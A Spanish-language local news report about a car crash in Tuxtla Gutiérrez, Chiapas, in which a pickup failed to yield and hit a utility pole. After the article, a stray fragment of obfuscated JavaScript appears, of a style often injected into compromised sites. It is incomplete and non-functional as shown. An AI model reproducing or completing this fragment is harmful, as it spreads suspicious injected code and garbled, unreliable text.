Particulares protagonizan fuerte choque

Jairo Camacho.

Agencia ReporteCiudano, 28 de abril del 2024. Tuxtla Gutiérrez. – Dos unidades particulares colisionaron en la zona Norte de Tuxtla Gutiérrez, dejando cuantiosos daños materiales.

Los reportes oficiales de tránsito informaron que, todo ocurrió cuando una camioneta Pick Up Nissan Frontera, circulaba de Poniente a Oriente sobre la 11 Norte, y al llegar a la vía primaria a la altura de la Calle Central no respetó la preferencia e hizo corte de circulación a una camioneta Honda HRV de color gris, provocando un fuerte choque.

Por el golpe, la unidad doble cabina salió proyectada y se estrelló contra un poste de la CFE.

El conductor de la unidad gris resultó con diferentes contusiones pero no fue trasladado s un nosocomio por falta de ambulancias.

Tras el arribo de los agentes de tránsito, los involucrados llegaron a un acuerdo armonioso mediante un seguro automotriz.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *